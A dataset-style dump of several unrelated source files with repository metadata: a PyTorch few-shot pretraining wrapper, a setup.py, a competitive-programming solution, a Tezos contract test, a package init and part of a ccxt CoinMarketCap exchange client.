1c3caab177ba19266092b993ec7f6d18af0990f9 | 10,534 | py | Python | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import torch
import torch.nn.functional as F
from src.tools.meters import BasicMeter
from src.modules.embedding_propagation import EmbeddingPropagation, LabelPropagation
from .base_wrapper import BaseWrapper
from src.modules.distances import prototype_distance
class PretrainWrapper(BaseWrapper):
"""Trains a model using an episodic scheme on multiple GPUs"""
def __init__(self, model, nclasses, exp_dict):
""" Constructor
Args:
model: architecture to train
nclasses: number of output classes
exp_dict: reference to dictionary with the hyperparameters
"""
super().__init__()
self.model = model
self.exp_dict = exp_dict
self.ngpu = self.exp_dict["ngpu"]
self.embedding_propagation = EmbeddingPropagation()
self.label_propagation = LabelPropagation()
self.model.add_classifier(nclasses, modalities=0)
self.nclasses = nclasses
if self.exp_dict["rotation_weight"] > 0:
self.model.add_classifier(4, "classifier_rot")
# Add optimizers here
self.optimizer = torch.optim.SGD(self.model.parameters(),
lr=self.exp_dict["lr"],
momentum=0.9,
weight_decay=self.exp_dict["weight_decay"],
nesterov=True)
self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
mode="min" if "loss" in self.exp_dict["target_loss"] else "max",
patience=self.exp_dict["patience"])
self.model.cuda()
if self.ngpu > 1:
self.parallel_model = torch.nn.DataParallel(self.model, device_ids=list(range(self.ngpu)))
def get_logits(self, embeddings, support_size, query_size, nclasses):
"""Computes the logits from the queries of an episode
Args:
embeddings (torch.Tensor): episode embeddings
support_size (int): size of the support set
query_size (int): size of the query set
nclasses (int): number of classes
Returns:
torch.Tensor: logits
"""
b, c = embeddings.size()
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
if self.exp_dict["distance_type"] == "labelprop":
support_labels = torch.arange(nclasses, device=embeddings.device).view(1, nclasses).repeat(support_size, 1).view(support_size, nclasses)
unlabeled_labels = nclasses * torch.ones(query_size * nclasses, dtype=support_labels.dtype, device=support_labels.device).view(query_size, nclasses)
labels = torch.cat([support_labels, unlabeled_labels], 0).view(-1)
logits = self.label_propagation(embeddings, labels, nclasses)
logits = logits.view(-1, nclasses, nclasses)[support_size:(support_size + query_size), ...].view(-1, nclasses)
elif self.exp_dict["distance_type"] == "prototypical":
embeddings = embeddings.view(-1, nclasses, c)
support_embeddings = embeddings[:support_size]
query_embeddings = embeddings[support_size:]
logits = prototype_distance(support_embeddings.view(-1, c),
query_embeddings.view(-1, c),
support_labels.view(-1))
return logits
def train_on_batch(self, batch):
"""Computes the loss of a batch
Args:
batch (tuple): Inputs and labels
Returns:
loss: Loss on the batch
"""
x, y, r = batch
y = y.cuda(non_blocking=True).view(-1)
r = r.cuda(non_blocking=True).view(-1)
k, n, c, h, w = x.size()
x = x.view(n*k, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
loss = 0
if self.exp_dict["rotation_weight"] > 0:
rot = self.model.classifier_rot(embeddings)
loss += F.cross_entropy(rot, r) * self.exp_dict["rotation_weight"]
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
logits = self.model.classifier(embeddings)
loss += F.cross_entropy(logits, y) * self.exp_dict["cross_entropy_weight"]
return loss
def val_on_batch(self, batch):
"""Computes the loss and accuracy on a validation batch
Args:
batch (dict): Episode dict
Returns:
tuple: loss and accuracy of the episode
"""
nclasses = batch["nclasses"]
query_size = batch["query_size"]
logits = self.predict_on_batch(batch)
query_labels = torch.arange(nclasses, device=logits.device).view(1, nclasses).repeat(query_size, 1).view(-1)
loss = F.cross_entropy(logits, query_labels)
accuracy = float(logits.max(-1)[1].eq(query_labels).float().mean())
return loss, accuracy
def predict_on_batch(self, batch):
"""Computes the logits of an episode
Args:
batch (dict): episode dict
Returns:
tensor: logits for the queries of the current episode
"""
nclasses = batch["nclasses"]
support_size = batch["support_size"]
query_size = batch["query_size"]
k = (support_size + query_size)
c = batch["channels"]
h = batch["height"]
w = batch["width"]
tx = batch["support_set"].view(support_size, nclasses, c, h, w).cuda(non_blocking=True)
vx = batch["query_set"].view(query_size, nclasses, c, h, w).cuda(non_blocking=True)
x = torch.cat([tx, vx], 0)
x = x.view(-1, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
return self.get_logits(embeddings, support_size, query_size, nclasses)
def train_on_loader(self, data_loader, max_iter=None, debug_plot_path=None):
"""Iterate over the training set
Args:
data_loader (torch.utils.data.DataLoader): a pytorch dataloader
max_iter (int, optional): Max number of iterations if the end of the dataset is not reached. Defaults to None.
Returns:
metrics: dictionary with metrics of the training set
"""
self.model.train()
train_loss_meter = BasicMeter.get("train_loss").reset()
# Iterate through tasks, each iteration loads n tasks, with n = number of GPU
for batch_idx, batch in enumerate(data_loader):
self.optimizer.zero_grad()
loss = self.train_on_batch(batch)
train_loss_meter.update(float(loss), 1)
loss.backward()
self.optimizer.step()
if batch_idx + 1 == max_iter:
break
return {"train_loss": train_loss_meter.mean()}
@torch.no_grad()
def val_on_loader(self, data_loader, max_iter=None):
"""Iterate over the validation set
Args:
data_loader: iterable validation data loader
max_iter: max number of iterations to perform if the end of the dataset is not reached
"""
self.model.eval()
val_loss_meter = BasicMeter.get("val_loss").reset()
val_accuracy_meter = BasicMeter.get("val_accuracy").reset()
# Iterate through tasks, each iteration loads n tasks, with n = number of GPU
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
val_loss_meter.update(float(loss), 1)
val_accuracy_meter.update(float(accuracy), 1)
loss = BasicMeter.get(self.exp_dict["target_loss"], recursive=True, force=False).mean()
self.scheduler.step(loss) # update the learning rate monitor
return {"val_loss": val_loss_meter.mean(), "val_accuracy": val_accuracy_meter.mean()}
@torch.no_grad()
def test_on_loader(self, data_loader, max_iter=None):
"""Iterate over the validation set
Args:
data_loader: iterable validation data loader
max_iter: max number of iterations to perform if the end of the dataset is not reached
"""
self.model.eval()
test_loss_meter = BasicMeter.get("test_loss").reset()
test_accuracy_meter = BasicMeter.get("test_accuracy").reset()
# Iterate through tasks, each iteration loads n tasks, with n = number of GPU
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
test_loss_meter.update(float(loss), 1)
test_accuracy_meter.update(float(accuracy), 1)
return {"test_loss": test_loss_meter.mean(), "test_accuracy": test_accuracy_meter.mean()}
def get_state_dict(self):
"""Obtains the state dict of this model including optimizer, scheduler, etc
Returns:
dict: state dict
"""
ret = {}
ret["optimizer"] = self.optimizer.state_dict()
ret["model"] = self.model.state_dict()
ret["scheduler"] = self.scheduler.state_dict()
return ret
def load_state_dict(self, state_dict):
"""Loads the state of the model
Args:
state_dict (dict): The state to load
"""
self.optimizer.load_state_dict(state_dict["optimizer"])
self.model.load_state_dict(state_dict["model"])
self.scheduler.load_state_dict(state_dict["scheduler"])
def get_lr(self):
ret = {}
for i, param_group in enumerate(self.optimizer.param_groups):
ret["current_lr_%d" % i] = float(param_group["lr"])
return ret
def is_end_of_training(self):
lr = self.get_lr()["current_lr_0"]
return lr <= (self.exp_dict["lr"] * self.exp_dict["min_lr_decay"]) | 41.636364 | 160 | 0.599677 | import numpy as np
import os
import torch
import torch.nn.functional as F
from src.tools.meters import BasicMeter
from src.modules.embedding_propagation import EmbeddingPropagation, LabelPropagation
from .base_wrapper import BaseWrapper
from src.modules.distances import prototype_distance
class PretrainWrapper(BaseWrapper):
def __init__(self, model, nclasses, exp_dict):
super().__init__()
self.model = model
self.exp_dict = exp_dict
self.ngpu = self.exp_dict["ngpu"]
self.embedding_propagation = EmbeddingPropagation()
self.label_propagation = LabelPropagation()
self.model.add_classifier(nclasses, modalities=0)
self.nclasses = nclasses
if self.exp_dict["rotation_weight"] > 0:
self.model.add_classifier(4, "classifier_rot")
self.optimizer = torch.optim.SGD(self.model.parameters(),
lr=self.exp_dict["lr"],
momentum=0.9,
weight_decay=self.exp_dict["weight_decay"],
nesterov=True)
self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
mode="min" if "loss" in self.exp_dict["target_loss"] else "max",
patience=self.exp_dict["patience"])
self.model.cuda()
if self.ngpu > 1:
self.parallel_model = torch.nn.DataParallel(self.model, device_ids=list(range(self.ngpu)))
def get_logits(self, embeddings, support_size, query_size, nclasses):
b, c = embeddings.size()
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
if self.exp_dict["distance_type"] == "labelprop":
support_labels = torch.arange(nclasses, device=embeddings.device).view(1, nclasses).repeat(support_size, 1).view(support_size, nclasses)
unlabeled_labels = nclasses * torch.ones(query_size * nclasses, dtype=support_labels.dtype, device=support_labels.device).view(query_size, nclasses)
labels = torch.cat([support_labels, unlabeled_labels], 0).view(-1)
logits = self.label_propagation(embeddings, labels, nclasses)
logits = logits.view(-1, nclasses, nclasses)[support_size:(support_size + query_size), ...].view(-1, nclasses)
elif self.exp_dict["distance_type"] == "prototypical":
embeddings = embeddings.view(-1, nclasses, c)
support_embeddings = embeddings[:support_size]
query_embeddings = embeddings[support_size:]
logits = prototype_distance(support_embeddings.view(-1, c),
query_embeddings.view(-1, c),
support_labels.view(-1))
return logits
def train_on_batch(self, batch):
x, y, r = batch
y = y.cuda(non_blocking=True).view(-1)
r = r.cuda(non_blocking=True).view(-1)
k, n, c, h, w = x.size()
x = x.view(n*k, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
loss = 0
if self.exp_dict["rotation_weight"] > 0:
rot = self.model.classifier_rot(embeddings)
loss += F.cross_entropy(rot, r) * self.exp_dict["rotation_weight"]
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
logits = self.model.classifier(embeddings)
loss += F.cross_entropy(logits, y) * self.exp_dict["cross_entropy_weight"]
return loss
def val_on_batch(self, batch):
nclasses = batch["nclasses"]
query_size = batch["query_size"]
logits = self.predict_on_batch(batch)
query_labels = torch.arange(nclasses, device=logits.device).view(1, nclasses).repeat(query_size, 1).view(-1)
loss = F.cross_entropy(logits, query_labels)
accuracy = float(logits.max(-1)[1].eq(query_labels).float().mean())
return loss, accuracy
def predict_on_batch(self, batch):
nclasses = batch["nclasses"]
support_size = batch["support_size"]
query_size = batch["query_size"]
k = (support_size + query_size)
c = batch["channels"]
h = batch["height"]
w = batch["width"]
tx = batch["support_set"].view(support_size, nclasses, c, h, w).cuda(non_blocking=True)
vx = batch["query_set"].view(query_size, nclasses, c, h, w).cuda(non_blocking=True)
x = torch.cat([tx, vx], 0)
x = x.view(-1, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
return self.get_logits(embeddings, support_size, query_size, nclasses)
def train_on_loader(self, data_loader, max_iter=None, debug_plot_path=None):
self.model.train()
train_loss_meter = BasicMeter.get("train_loss").reset()
for batch_idx, batch in enumerate(data_loader):
self.optimizer.zero_grad()
loss = self.train_on_batch(batch)
train_loss_meter.update(float(loss), 1)
loss.backward()
self.optimizer.step()
if batch_idx + 1 == max_iter:
break
return {"train_loss": train_loss_meter.mean()}
@torch.no_grad()
def val_on_loader(self, data_loader, max_iter=None):
self.model.eval()
val_loss_meter = BasicMeter.get("val_loss").reset()
val_accuracy_meter = BasicMeter.get("val_accuracy").reset()
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
val_loss_meter.update(float(loss), 1)
val_accuracy_meter.update(float(accuracy), 1)
loss = BasicMeter.get(self.exp_dict["target_loss"], recursive=True, force=False).mean()
self.scheduler.step(loss)
return {"val_loss": val_loss_meter.mean(), "val_accuracy": val_accuracy_meter.mean()}
@torch.no_grad()
def test_on_loader(self, data_loader, max_iter=None):
self.model.eval()
test_loss_meter = BasicMeter.get("test_loss").reset()
test_accuracy_meter = BasicMeter.get("test_accuracy").reset()
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
test_loss_meter.update(float(loss), 1)
test_accuracy_meter.update(float(accuracy), 1)
return {"test_loss": test_loss_meter.mean(), "test_accuracy": test_accuracy_meter.mean()}
def get_state_dict(self):
ret = {}
ret["optimizer"] = self.optimizer.state_dict()
ret["model"] = self.model.state_dict()
ret["scheduler"] = self.scheduler.state_dict()
return ret
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict["optimizer"])
self.model.load_state_dict(state_dict["model"])
self.scheduler.load_state_dict(state_dict["scheduler"])
def get_lr(self):
ret = {}
for i, param_group in enumerate(self.optimizer.param_groups):
ret["current_lr_%d" % i] = float(param_group["lr"])
return ret
def is_end_of_training(self):
lr = self.get_lr()["current_lr_0"]
return lr <= (self.exp_dict["lr"] * self.exp_dict["min_lr_decay"]) | true | true |
1c3cad6489686e71d6b612bcf98fda2ef987c325 | 685 | py | Python | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
] | null | null | null | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
] | 4 | 2020-08-30T03:52:50.000Z | 2020-09-03T02:51:01.000Z | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="atsapi",
description="An API to make some game utilites for TrekMUSH: Among The Stars available via HTTP",
url="https://github.com/kcphysics/ATSAPI",
author="KCPhysics",
packages=find_packages(),
classifiers=[
"Programmin Language :: Python :: 3.6.8",
"Natural Language :: English",
"License :: MIT"
],
entry_points={
"console_scripts": [
]
},
zip_safe=False,
install_requires=[
"aiohttp",
"aiohttp-swagger",
"aiohttp-tokenauth",
"aiohttp-jinja2",
"importlib_resources",
"aioredis"
]
)
| 24.464286 | 101 | 0.586861 | from setuptools import setup, find_packages
setup(
name="atsapi",
description="An API to make some game utilites for TrekMUSH: Among The Stars available via HTTP",
url="https://github.com/kcphysics/ATSAPI",
author="KCPhysics",
packages=find_packages(),
classifiers=[
"Programmin Language :: Python :: 3.6.8",
"Natural Language :: English",
"License :: MIT"
],
entry_points={
"console_scripts": [
]
},
zip_safe=False,
install_requires=[
"aiohttp",
"aiohttp-swagger",
"aiohttp-tokenauth",
"aiohttp-jinja2",
"importlib_resources",
"aioredis"
]
)
| true | true |
1c3cad9d933bf2cb75ef6f8e0df67f4f37153be8 | 471 | py | Python | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | # https://atcoder.jp/contests/abc064/tasks/abc064_d
from collections import deque
N = int(input())
S = [s for s in input()]
deqS = deque(S)
left = 0
right = 0
for i, s in enumerate(S):
if s == '(':
left += 1
else:
right += 1
if right > left:
deqS.appendleft('(')
left += 1
continue
if i == N - 1 and left > right:
addStr = ')' * (left - right)
deqS.append(addStr)
newS = "".join(deqS)
print(newS)
| 19.625 | 51 | 0.535032 |
from collections import deque
N = int(input())
S = [s for s in input()]
deqS = deque(S)
left = 0
right = 0
for i, s in enumerate(S):
if s == '(':
left += 1
else:
right += 1
if right > left:
deqS.appendleft('(')
left += 1
continue
if i == N - 1 and left > right:
addStr = ')' * (left - right)
deqS.append(addStr)
newS = "".join(deqS)
print(newS)
| true | true |
1c3cadc1558b288943a4faced43eca5c4e162225 | 1,888 | py | Python | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 98 | 2019-02-07T16:33:38.000Z | 2022-03-31T15:53:41.000Z | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 152 | 2019-05-20T16:38:56.000Z | 2022-03-30T14:24:38.000Z | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 34 | 2019-07-25T12:03:51.000Z | 2021-11-11T22:23:38.000Z | from unittest import TestCase
from os.path import dirname, join
import json
from pytezos.michelson.program import MichelsonProgram
from pytezos.michelson.types.big_map import big_map_diff_to_lazy_diff
from pytezos.michelson.forge import forge_micheline, unforge_micheline
folder = 'dexter_usdtz_xtz'
entrypoint = 'removeLiquidity'
class MainnetOperationTestCaseGBWIFG(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'setWhiteListing.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'setWhiteListing'
cls.operation = operation
# cls.maxDiff = None
def test_parameters_gbwifg(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
# pprint(py_obj)
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_gbwifg(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_diff = big_map_diff_to_lazy_diff(self.operation['big_map_diff'])
extended_storage = storage.merge_lazy_diff(lazy_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
# pprint(py_obj)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
| 39.333333 | 112 | 0.724047 | from unittest import TestCase
from os.path import dirname, join
import json
from pytezos.michelson.program import MichelsonProgram
from pytezos.michelson.types.big_map import big_map_diff_to_lazy_diff
from pytezos.michelson.forge import forge_micheline, unforge_micheline
folder = 'dexter_usdtz_xtz'
entrypoint = 'removeLiquidity'
class MainnetOperationTestCaseGBWIFG(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'setWhiteListing.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'setWhiteListing'
cls.operation = operation
def test_parameters_gbwifg(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_gbwifg(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_diff = big_map_diff_to_lazy_diff(self.operation['big_map_diff'])
extended_storage = storage.merge_lazy_diff(lazy_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
| true | true |
1c3cae4502ee75c7b7c37cdf55564728c019dcec | 518 | py | Python | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | # Copyright (c) Yiming Wang
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .asr_dataset import AsrDataset
from .asr_dictionary import AsrDictionary
from .feat_text_dataset import (
AsrTextDataset,
FeatScpCachedDataset,
FeatScpDataset,
FeatScpInMemoryDataset,
)
__all__ = [
'AsrDataset',
'AsrDictionary',
'AsrTextDataset',
'FeatScpCachedDataset',
'FeatScpDataset',
'FeatScpInMemoryDataset',
]
| 22.521739 | 65 | 0.737452 |
from .asr_dataset import AsrDataset
from .asr_dictionary import AsrDictionary
from .feat_text_dataset import (
AsrTextDataset,
FeatScpCachedDataset,
FeatScpDataset,
FeatScpInMemoryDataset,
)
__all__ = [
'AsrDataset',
'AsrDictionary',
'AsrTextDataset',
'FeatScpCachedDataset',
'FeatScpDataset',
'FeatScpInMemoryDataset',
]
| true | true |
1c3cae7a04ed48a7722897ae9024e5eca9692bd2 | 9,726 | py | Python | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 73 | 2018-05-15T00:53:50.000Z | 2022-03-07T14:45:11.000Z | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 20 | 2018-05-15T08:46:45.000Z | 2018-06-19T08:49:27.000Z | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 11 | 2018-05-15T00:09:30.000Z | 2022-03-07T14:45:27.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
class coinmarketcap (Exchange):
def describe(self):
return self.deep_extend(super(coinmarketcap, self).describe(), {
'id': 'coinmarketcap',
'name': 'CoinMarketCap',
'rateLimit': 10000,
'version': 'v1',
'countries': 'US',
'has': {
'CORS': True,
'privateAPI': False,
'createOrder': False,
'createMarketOrder': False,
'createLimitOrder': False,
'cancelOrder': False,
'editOrder': False,
'fetchBalance': False,
'fetchOrderBook': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchTickers': True,
'fetchCurrencies': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28244244-9be6312a-69ed-11e7-99c1-7c1797275265.jpg',
'api': {
'public': 'https://api.coinmarketcap.com',
'files': 'https://files.coinmarketcap.com',
'charts': 'https://graph.coinmarketcap.com',
},
'www': 'https://coinmarketcap.com',
'doc': 'https://coinmarketcap.com/api',
},
'requiredCredentials': {
'apiKey': False,
'secret': False,
},
'api': {
'files': {
'get': [
'generated/stats/global.json',
],
},
'graphs': {
'get': [
'currencies/{name}/',
],
},
'public': {
'get': [
'ticker/',
'ticker/{id}/',
'global/',
],
},
},
'currencyCodes': [
'AUD',
'BRL',
'CAD',
'CHF',
'CNY',
'EUR',
'GBP',
'HKD',
'IDR',
'INR',
'JPY',
'KRW',
'MXN',
'RUB',
'USD',
],
})
def fetch_order_book(self, symbol, limit=None, params={}):
raise ExchangeError('Fetching order books is not supported by the API of ' + self.id)
def currency_code(self, base, name):
currencies = {
'ACChain': 'ACChain',
'AdCoin': 'AdCoin',
'BatCoin': 'BatCoin',
'Bitgem': 'Bitgem',
'BlazeCoin': 'BlazeCoin',
'BlockCAT': 'BlockCAT',
'Catcoin': 'Catcoin',
'Hi Mutual Society': 'Hi Mutual Society',
'iCoin': 'iCoin',
'Maggie': 'Maggie',
'MIOTA': 'IOTA', # a special case, most exchanges list it as IOTA, therefore we change just the Coinmarketcap instead of changing them all
'NetCoin': 'NetCoin',
'Polcoin': 'Polcoin',
}
if name in currencies:
return currencies[name]
return base
def fetch_markets(self):
markets = self.publicGetTicker({
'limit': 0,
})
result = []
for p in range(0, len(markets)):
market = markets[p]
currencies = self.currencyCodes
for i in range(0, len(currencies)):
quote = currencies[i]
quoteId = quote.lower()
baseId = market['id']
base = self.currency_code(market['symbol'], market['name'])
symbol = base + '/' + quote
id = baseId + '/' + quoteId
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_global(self, currency='USD'):
self.load_markets()
request = {}
if currency:
request['convert'] = currency
return self.publicGetGlobal(request)
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
if 'last_updated' in ticker:
if ticker['last_updated']:
timestamp = int(ticker['last_updated']) * 1000
change = None
if 'percent_change_24h' in ticker:
if ticker['percent_change_24h']:
change = self.safe_float(ticker, 'percent_change_24h')
last = None
symbol = None
volume = None
if market:
priceKey = 'price_' + market['quoteId']
if priceKey in ticker:
if ticker[priceKey]:
last = self.safe_float(ticker, priceKey)
symbol = market['symbol']
volumeKey = '24h_volume_' + market['quoteId']
if volumeKey in ticker:
if ticker[volumeKey]:
volume = self.safe_float(ticker, volumeKey)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': volume,
'info': ticker,
}
def fetch_tickers(self, currency='USD', params={}):
self.load_markets()
request = {
'limit': 10000,
}
if currency:
request['convert'] = currency
response = self.publicGetTicker(self.extend(request, params))
tickers = {}
for t in range(0, len(response)):
ticker = response[t]
currencyId = self.currencies[currency]['id'] if (currency in list(self.currencies.keys())) else currency.lower()
id = ticker['id'] + '/' + currencyId
symbol = id
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
tickers[symbol] = self.parse_ticker(ticker, market)
return tickers
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = self.extend({
'convert': market['quote'],
'id': market['baseId'],
}, params)
response = self.publicGetTickerId(request)
ticker = response[0]
return self.parse_ticker(ticker, market)
def fetch_currencies(self, params={}):
currencies = self.publicGetTicker(self.extend({
'limit': 0,
}, params))
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = currency['symbol']
name = currency['name']
# todo: will need to rethink the fees
# to add support for multiple withdrawal/deposit methods and
# differentiated fees for each particular method
precision = 8 # default precision, todo: fix "magic constants"
code = self.currency_code(id, name)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': True,
'status': 'ok',
'fee': None, # todo: redesign
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'withdraw': {
'min': None,
'max': None,
},
},
}
return result
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
if response['error']:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| 35.111913 | 151 | 0.451676 |
ge import Exchange
import math
from ccxt.base.errors import ExchangeError
class coinmarketcap (Exchange):
def describe(self):
return self.deep_extend(super(coinmarketcap, self).describe(), {
'id': 'coinmarketcap',
'name': 'CoinMarketCap',
'rateLimit': 10000,
'version': 'v1',
'countries': 'US',
'has': {
'CORS': True,
'privateAPI': False,
'createOrder': False,
'createMarketOrder': False,
'createLimitOrder': False,
'cancelOrder': False,
'editOrder': False,
'fetchBalance': False,
'fetchOrderBook': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchTickers': True,
'fetchCurrencies': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28244244-9be6312a-69ed-11e7-99c1-7c1797275265.jpg',
'api': {
'public': 'https://api.coinmarketcap.com',
'files': 'https://files.coinmarketcap.com',
'charts': 'https://graph.coinmarketcap.com',
},
'www': 'https://coinmarketcap.com',
'doc': 'https://coinmarketcap.com/api',
},
'requiredCredentials': {
'apiKey': False,
'secret': False,
},
'api': {
'files': {
'get': [
'generated/stats/global.json',
],
},
'graphs': {
'get': [
'currencies/{name}/',
],
},
'public': {
'get': [
'ticker/',
'ticker/{id}/',
'global/',
],
},
},
'currencyCodes': [
'AUD',
'BRL',
'CAD',
'CHF',
'CNY',
'EUR',
'GBP',
'HKD',
'IDR',
'INR',
'JPY',
'KRW',
'MXN',
'RUB',
'USD',
],
})
def fetch_order_book(self, symbol, limit=None, params={}):
raise ExchangeError('Fetching order books is not supported by the API of ' + self.id)
def currency_code(self, base, name):
currencies = {
'ACChain': 'ACChain',
'AdCoin': 'AdCoin',
'BatCoin': 'BatCoin',
'Bitgem': 'Bitgem',
'BlazeCoin': 'BlazeCoin',
'BlockCAT': 'BlockCAT',
'Catcoin': 'Catcoin',
